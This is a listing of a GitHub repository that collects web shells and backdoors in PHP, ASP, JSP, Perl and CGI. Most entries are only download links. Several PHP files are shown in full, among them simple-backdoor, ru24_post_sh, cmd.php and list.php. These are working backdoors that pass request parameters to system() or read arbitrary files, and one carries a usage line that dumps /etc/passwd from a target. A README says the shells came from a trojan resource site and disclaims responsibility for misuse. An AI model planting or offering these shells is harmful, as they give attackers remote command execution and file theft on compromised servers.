-------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/FaTaLisTiCz_Fx.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/FaTaLisTiCz_Fx.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/Fx29Sh.3.2.12.08.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/Fx29Sh.3.2.12.08.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/G5.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/G5.php -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/GFS web-shell ver 3.1.7 - PRiV8.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/GFS web-shell ver 3.1.7 - PRiV8.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/KAdot Universal Shell v0.1.6.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/KAdot Universal Shell v0.1.6.php -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/KAdot Universal Shell v0.1.6.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/KAdot Universal Shell v0.1.6.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/NetworkFileManagerPHP.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/NetworkFileManagerPHP.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/PH Vayv.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/PH Vayv.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/PHANTASMA.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/PHANTASMA.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/PHPRemoteView.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/PHPRemoteView.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/PHPSPY.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/PHPSPY.php -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/Php_Backdoor.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/Php_Backdoor.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/Private-i3lue.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/Private-i3lue.php -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/Private-i3lue.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/Private-i3lue.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/RedhatC99 [login=redhat-pass=root]: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/RedhatC99 [login=redhat-pass=root] -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/SnIpEr_SA Shell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/SnIpEr_SA Shell.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/aZRaiLPhp v1.0.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/aZRaiLPhp v1.0.php -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/aZRaiLPhp v1.0.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/aZRaiLPhp v1.0.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/accept_language.txt: -------------------------------------------------------------------------------- 1 | by q1w2e3r4'; ?> 2 | -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/antichat.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/antichat.php -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/arabicspy.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/arabicspy.php -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/b374k.v1.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/b374k.v1.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/bug (1).php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/bug.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/c100.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/c100.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/c66.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/c66.php -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/c99.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/c99.php -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/c99.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/c99.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/c993.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/c993.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/c99_PSych0.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/c99_PSych0.php -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/c99shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/c99shell.php -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/c99v2.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/c99v2.php -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/cmd.php: -------------------------------------------------------------------------------- 1 | 11 | 12 |
13 | 14 | 15 |
16 |
17 | 
22 | 
23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/cmd.txt: -------------------------------------------------------------------------------- 1 |
-------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/ctt_sh.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/ctt_sh.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/cybershell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/cybershell.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/egy.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/egy.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/erne.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/erne.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/ex0shell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/ex0shell.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/gfs_sh.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/gfs_sh.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/iMHaPFtp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/iMHaPFtp.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/kral.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/kral.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/list.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | " . $filename . "
"; 23 | } 24 | closedir($handle); 25 | } else { 26 | echo "FILE: " . $fichero . "

";
27 |   $fp = fopen($fichero, "r");
28 |   $buffer = fread($fp, filesize($fichero));
29 |   echo $buffer;
30 |   fclose($fp);
31 |   }
32 | 
33 | ?>


--------------------------------------------------------------------------------
/web-malware-collection-13-06-2012/PHP/load_shell.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/load_shell.txt


--------------------------------------------------------------------------------
/web-malware-collection-13-06-2012/PHP/myshell.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/myshell.txt


--------------------------------------------------------------------------------
/web-malware-collection-13-06-2012/PHP/mysql.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/mysql.txt


--------------------------------------------------------------------------------
/web-malware-collection-13-06-2012/PHP/nshell.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/nshell.txt


--------------------------------------------------------------------------------
/web-malware-collection-13-06-2012/PHP/nst.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/nst.txt


--------------------------------------------------------------------------------
/web-malware-collection-13-06-2012/PHP/nstview.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/nstview.txt


--------------------------------------------------------------------------------
/web-malware-collection-13-06-2012/PHP/priv8-2012-bypass-shell.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/priv8-2012-bypass-shell.txt


--------------------------------------------------------------------------------
/web-malware-collection-13-06-2012/PHP/r57shell1.40.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/r57shell1.40.txt


--------------------------------------------------------------------------------
/web-malware-collection-13-06-2012/PHP/remview_fix.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/remview_fix.php


--------------------------------------------------------------------------------
/web-malware-collection-13-06-2012/PHP/rootshell.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/rootshell.txt


--------------------------------------------------------------------------------
/web-malware-collection-13-06-2012/PHP/ru24_post_sh.txt:
--------------------------------------------------------------------------------
 1 | 
11 | 
12 | Ru24PostWebShell - ".$_POST['cmd']."
13 | 
14 | ";
15 | echo "
"; 16 | echo ""; 17 | echo "
"; 18 | echo "
";
19 | if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
20 | echo "".$function($_POST['cmd'])."
"; 21 | 22 | 23 | ?> 24 | -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/s72 Shell v1.1 Coding.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/s72 Shell v1.1 Coding.php -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/s72 Shell v1.1 Coding.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/s72 Shell v1.1 Coding.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/safe0ver.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PHP/safe0ver.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/simple-backdoor.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | "; 7 | $cmd = ($_REQUEST['cmd']); 8 | system($cmd); 9 | echo "
"; 10 | die; 11 | } 12 | 13 | ?> 14 | 15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 16 | 17 | 18 | -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PHP/simple_cmd.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | G-Security Webshell 4 | 5 | 6 | 7 |
8 |
9 | 11 |
12 |
13 | 
14 | 
15 | 
16 |
17 | 18 | 2 | 3 | Send this file: 4 | 5 | 6 | 9 | -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/PL/cgitelnet.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/web-malware-collection-13-06-2012/PL/cgitelnet.txt -------------------------------------------------------------------------------- /web-malware-collection-13-06-2012/README.md: -------------------------------------------------------------------------------- 1 | 这个web 恶意程序(web-malware-collection) 收集的 2 | 3 | 留个备份 4 | 5 | 前人种树,后人乘凉 6 | 7 | 感谢大牛们的无私贡献 -------------------------------------------------------------------------------- /www-7jyewu-cn/README.md: -------------------------------------------------------------------------------- 1 | 这个都是从中国木马资源网下载而来 2 | 3 | url:http://www.7jyewu.cn/ 4 | 5 | http://pan.baidu.com/share/home?uk=154628787&view=share#category/type=0 6 | 7 | 8 | 请谨慎使用,所造成的一切后果,与本人无关。 9 | -------------------------------------------------------------------------------- /www-7jyewu-cn/UnKnown 高级Vip防删收费版 (1).asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/UnKnown 高级Vip防删收费版 (1).asp -------------------------------------------------------------------------------- /www-7jyewu-cn/UnKnown 高级Vip防删收费版.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/UnKnown 高级Vip防删收费版.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/asp小马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/asp小马.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/【批量下载】银河舰队大马_2014版等.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/【批量下载】银河舰队大马_2014版等.zip -------------------------------------------------------------------------------- /www-7jyewu-cn/不灭之魂2013改进版本.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/不灭之魂2013改进版本.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/不灭之魂2014改进版本.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/不灭之魂2014改进版本.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/传说中的草泥马4.0 (1).asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/传说中的草泥马4.0 (1).asp -------------------------------------------------------------------------------- /www-7jyewu-cn/传说中的草泥马4.0.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/传说中的草泥马4.0.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/免杀php大马.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/免杀php大马.php -------------------------------------------------------------------------------- /www-7jyewu-cn/土司搞基asp大马 (1).asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/土司搞基asp大马 (1).asp -------------------------------------------------------------------------------- /www-7jyewu-cn/土司搞基asp大马 (1)_重命名_2014-10-23-14-54-16.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/土司搞基asp大马 (1)_重命名_2014-10-23-14-54-16.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/土司搞基asp大马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/土司搞基asp大马.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/拿站小助手-经典Asp小马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/拿站小助手-经典Asp小马.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/星外虚拟机提权专用asp大马 (1).asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/星外虚拟机提权专用asp大马 (1).asp -------------------------------------------------------------------------------- /www-7jyewu-cn/星外虚拟机提权专用asp大马 (1)_重命名_2014-10-23-14-54-16.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/星外虚拟机提权专用asp大马 (1)_重命名_2014-10-23-14-54-16.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/星外虚拟机提权专用asp大马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/星外虚拟机提权专用asp大马.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/最新过安全狗- 免杀PHP大马 -.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/最新过安全狗- 免杀PHP大马 -.php -------------------------------------------------------------------------------- /www-7jyewu-cn/法克僵尸大马 (1).asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/法克僵尸大马 (1).asp -------------------------------------------------------------------------------- /www-7jyewu-cn/法克僵尸大马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/法克僵尸大马.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/火狐NEW WebShell (1).asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/火狐NEW WebShell (1).asp -------------------------------------------------------------------------------- /www-7jyewu-cn/火狐NEW WebShell (1)_重命名_2014-10-23-14-54-16.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/火狐NEW WebShell (1)_重命名_2014-10-23-14-54-16.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/火狐NEW WebShell.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/火狐NEW WebShell.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/牛逼免杀提权隐藏大马 (1).asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/牛逼免杀提权隐藏大马 (1).asp -------------------------------------------------------------------------------- /www-7jyewu-cn/牛逼免杀提权隐藏大马 (1)_重命名_2014-10-23-14-54-16.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/牛逼免杀提权隐藏大马 (1)_重命名_2014-10-23-14-54-16.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/牛逼免杀提权隐藏大马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/牛逼免杀提权隐藏大马.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/银河舰队大马_2012版.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/银河舰队大马_2012版.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/银河舰队大马_2014版.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/银河舰队大马_2014版.asp -------------------------------------------------------------------------------- /www-7jyewu-cn/非常牛逼的Jsp大马.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/www-7jyewu-cn/非常牛逼的Jsp大马.jsp -------------------------------------------------------------------------------- /xakep-shells/ASP/CyberSpy5.Asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/ASP/CyberSpy5.Asp.txt -------------------------------------------------------------------------------- /xakep-shells/ASP/EFSO_2.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/ASP/EFSO_2.asp.txt -------------------------------------------------------------------------------- /xakep-shells/ASP/NT Addy.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/ASP/NT Addy.asp.txt -------------------------------------------------------------------------------- /xakep-shells/ASP/Rader.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/ASP/Rader.asp.txt -------------------------------------------------------------------------------- /xakep-shells/ASP/Reader.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/ASP/Reader.asp.txt -------------------------------------------------------------------------------- /xakep-shells/ASP/RemExp.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/ASP/RemExp.asp.txt -------------------------------------------------------------------------------- /xakep-shells/ASP/Tool.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/ASP/Tool.asp.txt -------------------------------------------------------------------------------- /xakep-shells/ASP/Zehir 4.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/ASP/Zehir 4.asp.txt -------------------------------------------------------------------------------- /xakep-shells/ASP/indexer.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/ASP/indexer.asp.txt -------------------------------------------------------------------------------- /xakep-shells/ASP/kacak.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/ASP/kacak.asp.txt -------------------------------------------------------------------------------- /xakep-shells/ASP/klasvayv.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/ASP/klasvayv.asp.txt -------------------------------------------------------------------------------- /xakep-shells/ASP/ntdaddy.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/ASP/ntdaddy.asp.txt -------------------------------------------------------------------------------- /xakep-shells/ASP/zehir4.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/ASP/zehir4.asp.txt -------------------------------------------------------------------------------- /xakep-shells/CGI/telnet.cgi.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/CGI/telnet.cgi.txt -------------------------------------------------------------------------------- 